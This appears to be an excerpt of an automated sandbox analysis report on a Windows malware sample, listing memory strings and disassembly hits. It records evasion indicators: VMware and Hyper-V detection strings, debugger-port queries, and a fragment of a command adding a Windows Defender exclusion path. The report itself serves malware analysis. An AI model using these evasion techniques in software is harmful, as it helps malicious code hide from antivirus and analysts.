          Source: explorer.exe, 00000003.00000000.697993865.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: lTAPQJikGw.exe, 00000000.00000002.657825890.0000000003382000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
          Source: lTAPQJikGw.exe, 00000000.00000002.657825890.0000000003382000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: explorer.exe, 00000003.00000000.677401262.000000000A9A0000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATA#
          Source: lTAPQJikGw.exe, 00000000.00000002.657825890.0000000003382000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000003.00000000.695466749.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000003.00000000.676552486.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000003.00000000.697628647.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000003.00000000.697628647.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: lTAPQJikGw.exe, 00000000.00000002.657825890.0000000003382000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: lTAPQJikGw.exe, 00000000.00000002.657825890.0000000003382000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: explorer.exe, 00000003.00000000.676624021.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: lTAPQJikGw.exe, 00000000.00000002.657825890.0000000003382000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: explorer.exe, 00000003.00000000.677443197.000000000A9E1000.00000004.00000001.sdmpBinary or memory string: _VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Vir
          Source: explorer.exe, 00000003.00000000.697628647.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\control.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_00409B10 LdrLoadDll,2_2_00409B10
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014FB944 mov eax, dword ptr fs:[00000030h]2_2_014FB944
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A5BA5 mov eax, dword ptr fs:[00000030h]2_2_015A5BA5
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01564257 mov eax, dword ptr fs:[00000030h]2_2_01564257
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0159EA55 mov eax, dword ptr fs:[00000030h]2_2_0159EA55
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D9240 mov eax, dword ptr fs:[00000030h]2_2_014D9240
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D9240 mov eax, dword ptr fs:[00000030h]2_2_014D9240
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D9240 mov eax, dword ptr fs:[00000030h]2_2_014D9240
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D9240 mov eax, dword ptr fs:[00000030h]2_2_014D9240
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0151927A mov eax, dword ptr fs:[00000030h]2_2_0151927A
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0158B260 mov eax, dword ptr fs:[00000030h]2_2_0158B260
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0158B260 mov eax, dword ptr fs:[00000030h]2_2_0158B260
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A8A62 mov eax, dword ptr fs:[00000030h]2_2_015A8A62
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E8A0A mov eax, dword ptr fs:[00000030h]2_2_014E8A0A
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0159AA16 mov eax, dword ptr fs:[00000030h]2_2_0159AA16
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0159AA16 mov eax, dword ptr fs:[00000030h]2_2_0159AA16
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014F3A1C mov eax, dword ptr fs:[00000030h]2_2_014F3A1C
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014DAA16 mov eax, dword ptr fs:[00000030h]2_2_014DAA16
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014DAA16 mov eax, dword ptr fs:[00000030h]2_2_014DAA16
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D5210 mov eax, dword ptr fs:[00000030h]2_2_014D5210
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D5210 mov ecx, dword ptr fs:[00000030h]2_2_014D5210
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D5210 mov eax, dword ptr fs:[00000030h]2_2_014D5210
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D5210 mov eax, dword ptr fs:[00000030h]2_2_014D5210
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014FA229 mov eax, dword ptr fs:[00000030h]2_2_014FA229
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014FA229 mov eax, dword ptr fs:[00000030h]2_2_014FA229
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014FA229 mov eax, dword ptr fs:[00000030h]2_2_014FA229
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014FA229 mov eax, dword ptr fs:[00000030h]2_2_014FA229
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014FA229 mov eax, dword ptr fs:[00000030h]2_2_014FA229
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014FA229 mov eax, dword ptr fs:[00000030h]2_2_014FA229
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014FA229 mov eax, dword ptr fs:[00000030h]2_2_014FA229
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014FA229 mov eax, dword ptr fs:[00000030h]2_2_014FA229
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014FA229 mov eax, dword ptr fs:[00000030h]2_2_014FA229
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01514A2C mov eax, dword ptr fs:[00000030h]2_2_01514A2C
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01514A2C mov eax, dword ptr fs:[00000030h]2_2_01514A2C
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01502ACB mov eax, dword ptr fs:[00000030h]2_2_01502ACB
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01502AE4 mov eax, dword ptr fs:[00000030h]2_2_01502AE4
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0150D294 mov eax, dword ptr fs:[00000030h]2_2_0150D294
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0150D294 mov eax, dword ptr fs:[00000030h]2_2_0150D294
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0150FAB0 mov eax, dword ptr fs:[00000030h]2_2_0150FAB0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D52A5 mov eax, dword ptr fs:[00000030h]2_2_014D52A5
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D52A5 mov eax, dword ptr fs:[00000030h]2_2_014D52A5
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D52A5 mov eax, dword ptr fs:[00000030h]2_2_014D52A5
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D52A5 mov eax, dword ptr fs:[00000030h]2_2_014D52A5
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D52A5 mov eax, dword ptr fs:[00000030h]2_2_014D52A5
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014EAAB0 mov eax, dword ptr fs:[00000030h]2_2_014EAAB0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014EAAB0 mov eax, dword ptr fs:[00000030h]2_2_014EAAB0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01513D43 mov eax, dword ptr fs:[00000030h]2_2_01513D43
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01553540 mov eax, dword ptr fs:[00000030h]2_2_01553540
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01583D40 mov eax, dword ptr fs:[00000030h]2_2_01583D40
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014F7D50 mov eax, dword ptr fs:[00000030h]2_2_014F7D50
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014FC577 mov eax, dword ptr fs:[00000030h]2_2_014FC577
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014FC577 mov eax, dword ptr fs:[00000030h]2_2_014FC577
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0159E539 mov eax, dword ptr fs:[00000030h]2_2_0159E539
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0155A537 mov eax, dword ptr fs:[00000030h]2_2_0155A537
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01504D3B mov eax, dword ptr fs:[00000030h]2_2_01504D3B
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01504D3B mov eax, dword ptr fs:[00000030h]2_2_01504D3B
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01504D3B mov eax, dword ptr fs:[00000030h]2_2_01504D3B
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A8D34 mov eax, dword ptr fs:[00000030h]2_2_015A8D34
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E3D34 mov eax, dword ptr fs:[00000030h]2_2_014E3D34
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E3D34 mov eax, dword ptr fs:[00000030h]2_2_014E3D34
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E3D34 mov eax, dword ptr fs:[00000030h]2_2_014E3D34
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E3D34 mov eax, dword ptr fs:[00000030h]2_2_014E3D34
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E3D34 mov eax, dword ptr fs:[00000030h]2_2_014E3D34
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E3D34 mov eax, dword ptr fs:[00000030h]2_2_014E3D34
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E3D34 mov eax, dword ptr fs:[00000030h]2_2_014E3D34
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E3D34 mov eax, dword ptr fs:[00000030h]2_2_014E3D34
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E3D34 mov eax, dword ptr fs:[00000030h]2_2_014E3D34
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E3D34 mov eax, dword ptr fs:[00000030h]2_2_014E3D34
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E3D34 mov eax, dword ptr fs:[00000030h]2_2_014E3D34
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E3D34 mov eax, dword ptr fs:[00000030h]2_2_014E3D34
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E3D34 mov eax, dword ptr fs:[00000030h]2_2_014E3D34
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014DAD30 mov eax, dword ptr fs:[00000030h]2_2_014DAD30
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01556DC9 mov eax, dword ptr fs:[00000030h]2_2_01556DC9
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01556DC9 mov eax, dword ptr fs:[00000030h]2_2_01556DC9
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01556DC9 mov eax, dword ptr fs:[00000030h]2_2_01556DC9
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01556DC9 mov ecx, dword ptr fs:[00000030h]2_2_01556DC9
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01556DC9 mov eax, dword ptr fs:[00000030h]2_2_01556DC9
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01556DC9 mov eax, dword ptr fs:[00000030h]2_2_01556DC9
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01588DF1 mov eax, dword ptr fs:[00000030h]2_2_01588DF1
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014ED5E0 mov eax, dword ptr fs:[00000030h]2_2_014ED5E0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014ED5E0 mov eax, dword ptr fs:[00000030h]2_2_014ED5E0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0159FDE2 mov eax, dword ptr fs:[00000030h]2_2_0159FDE2
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0159FDE2 mov eax, dword ptr fs:[00000030h]2_2_0159FDE2
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0159FDE2 mov eax, dword ptr fs:[00000030h]2_2_0159FDE2
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0159FDE2 mov eax, dword ptr fs:[00000030h]2_2_0159FDE2
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D2D8A mov eax, dword ptr fs:[00000030h]2_2_014D2D8A
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D2D8A mov eax, dword ptr fs:[00000030h]2_2_014D2D8A
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D2D8A mov eax, dword ptr fs:[00000030h]2_2_014D2D8A
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D2D8A mov eax, dword ptr fs:[00000030h]2_2_014D2D8A
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D2D8A mov eax, dword ptr fs:[00000030h]2_2_014D2D8A
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0150FD9B mov eax, dword ptr fs:[00000030h]2_2_0150FD9B
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0150FD9B mov eax, dword ptr fs:[00000030h]2_2_0150FD9B
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01502581 mov eax, dword ptr fs:[00000030h]2_2_01502581
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01502581 mov eax, dword ptr fs:[00000030h]2_2_01502581
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01502581 mov eax, dword ptr fs:[00000030h]2_2_01502581
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01502581 mov eax, dword ptr fs:[00000030h]2_2_01502581
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01501DB5 mov eax, dword ptr fs:[00000030h]2_2_01501DB5
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01501DB5 mov eax, dword ptr fs:[00000030h]2_2_01501DB5
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01501DB5 mov eax, dword ptr fs:[00000030h]2_2_01501DB5
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015035A1 mov eax, dword ptr fs:[00000030h]2_2_015035A1
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A05AC mov eax, dword ptr fs:[00000030h]2_2_015A05AC
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A05AC mov eax, dword ptr fs:[00000030h]2_2_015A05AC
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0156C450 mov eax, dword ptr fs:[00000030h]2_2_0156C450
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0156C450 mov eax, dword ptr fs:[00000030h]2_2_0156C450
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0150A44B mov eax, dword ptr fs:[00000030h]2_2_0150A44B
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014F746D mov eax, dword ptr fs:[00000030h]2_2_014F746D
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A740D mov eax, dword ptr fs:[00000030h]2_2_015A740D
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A740D mov eax, dword ptr fs:[00000030h]2_2_015A740D
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A740D mov eax, dword ptr fs:[00000030h]2_2_015A740D
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01591C06 mov eax, dword ptr fs:[00000030h]2_2_01591C06
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01591C06 mov eax, dword ptr fs:[00000030h]2_2_01591C06
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01591C06 mov eax, dword ptr fs:[00000030h]2_2_01591C06
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01591C06 mov eax, dword ptr fs:[00000030h]2_2_01591C06
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01591C06 mov eax, dword ptr fs:[00000030h]2_2_01591C06
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01591C06 mov eax, dword ptr fs:[00000030h]2_2_01591C06
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01591C06 mov eax, dword ptr fs:[00000030h]2_2_01591C06
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01591C06 mov eax, dword ptr fs:[00000030h]2_2_01591C06
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01591C06 mov eax, dword ptr fs:[00000030h]2_2_01591C06
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01591C06 mov eax, dword ptr fs:[00000030h]2_2_01591C06
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01591C06 mov eax, dword ptr fs:[00000030h]2_2_01591C06
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01591C06 mov eax, dword ptr fs:[00000030h]2_2_01591C06
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01591C06 mov eax, dword ptr fs:[00000030h]2_2_01591C06
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01591C06 mov eax, dword ptr fs:[00000030h]2_2_01591C06
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01556C0A mov eax, dword ptr fs:[00000030h]2_2_01556C0A
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01556C0A mov eax, dword ptr fs:[00000030h]2_2_01556C0A
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01556C0A mov eax, dword ptr fs:[00000030h]2_2_01556C0A
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01556C0A mov eax, dword ptr fs:[00000030h]2_2_01556C0A
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0150BC2C mov eax, dword ptr fs:[00000030h]2_2_0150BC2C
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A8CD6 mov eax, dword ptr fs:[00000030h]2_2_015A8CD6
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015914FB mov eax, dword ptr fs:[00000030h]2_2_015914FB
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01556CF0 mov eax, dword ptr fs:[00000030h]2_2_01556CF0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01556CF0 mov eax, dword ptr fs:[00000030h]2_2_01556CF0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01556CF0 mov eax, dword ptr fs:[00000030h]2_2_01556CF0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E849B mov eax, dword ptr fs:[00000030h]2_2_014E849B
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014EEF40 mov eax, dword ptr fs:[00000030h]2_2_014EEF40
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014EFF60 mov eax, dword ptr fs:[00000030h]2_2_014EFF60
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A8F6A mov eax, dword ptr fs:[00000030h]2_2_015A8F6A
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0156FF10 mov eax, dword ptr fs:[00000030h]2_2_0156FF10
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0156FF10 mov eax, dword ptr fs:[00000030h]2_2_0156FF10
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A070D mov eax, dword ptr fs:[00000030h]2_2_015A070D
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A070D mov eax, dword ptr fs:[00000030h]2_2_015A070D
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014FF716 mov eax, dword ptr fs:[00000030h]2_2_014FF716
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0150A70E mov eax, dword ptr fs:[00000030h]2_2_0150A70E
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0150A70E mov eax, dword ptr fs:[00000030h]2_2_0150A70E
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0150E730 mov eax, dword ptr fs:[00000030h]2_2_0150E730
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D4F2E mov eax, dword ptr fs:[00000030h]2_2_014D4F2E
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D4F2E mov eax, dword ptr fs:[00000030h]2_2_014D4F2E
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015137F5 mov eax, dword ptr fs:[00000030h]2_2_015137F5
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01557794 mov eax, dword ptr fs:[00000030h]2_2_01557794
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01557794 mov eax, dword ptr fs:[00000030h]2_2_01557794
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01557794 mov eax, dword ptr fs:[00000030h]2_2_01557794
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E8794 mov eax, dword ptr fs:[00000030h]2_2_014E8794
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E7E41 mov eax, dword ptr fs:[00000030h]2_2_014E7E41
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E7E41 mov eax, dword ptr fs:[00000030h]2_2_014E7E41
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E7E41 mov eax, dword ptr fs:[00000030h]2_2_014E7E41
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E7E41 mov eax, dword ptr fs:[00000030h]2_2_014E7E41
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E7E41 mov eax, dword ptr fs:[00000030h]2_2_014E7E41
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E7E41 mov eax, dword ptr fs:[00000030h]2_2_014E7E41
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0159AE44 mov eax, dword ptr fs:[00000030h]2_2_0159AE44
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0159AE44 mov eax, dword ptr fs:[00000030h]2_2_0159AE44
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E766D mov eax, dword ptr fs:[00000030h]2_2_014E766D
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014FAE73 mov eax, dword ptr fs:[00000030h]2_2_014FAE73
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014FAE73 mov eax, dword ptr fs:[00000030h]2_2_014FAE73
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014FAE73 mov eax, dword ptr fs:[00000030h]2_2_014FAE73
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014FAE73 mov eax, dword ptr fs:[00000030h]2_2_014FAE73
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014FAE73 mov eax, dword ptr fs:[00000030h]2_2_014FAE73
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0150A61C mov eax, dword ptr fs:[00000030h]2_2_0150A61C
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0150A61C mov eax, dword ptr fs:[00000030h]2_2_0150A61C
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014DC600 mov eax, dword ptr fs:[00000030h]2_2_014DC600
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014DC600 mov eax, dword ptr fs:[00000030h]2_2_014DC600
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014DC600 mov eax, dword ptr fs:[00000030h]2_2_014DC600
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01508E00 mov eax, dword ptr fs:[00000030h]2_2_01508E00
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01591608 mov eax, dword ptr fs:[00000030h]2_2_01591608
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0158FE3F mov eax, dword ptr fs:[00000030h]2_2_0158FE3F
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014DE620 mov eax, dword ptr fs:[00000030h]2_2_014DE620
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A8ED6 mov eax, dword ptr fs:[00000030h]2_2_015A8ED6
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01518EC7 mov eax, dword ptr fs:[00000030h]2_2_01518EC7
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0158FEC0 mov eax, dword ptr fs:[00000030h]2_2_0158FEC0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015036CC mov eax, dword ptr fs:[00000030h]2_2_015036CC
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E76E2 mov eax, dword ptr fs:[00000030h]2_2_014E76E2
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015016E0 mov ecx, dword ptr fs:[00000030h]2_2_015016E0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0156FE87 mov eax, dword ptr fs:[00000030h]2_2_0156FE87
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015546A7 mov eax, dword ptr fs:[00000030h]2_2_015546A7
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A0EA5 mov eax, dword ptr fs:[00000030h]2_2_015A0EA5
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A0EA5 mov eax, dword ptr fs:[00000030h]2_2_015A0EA5
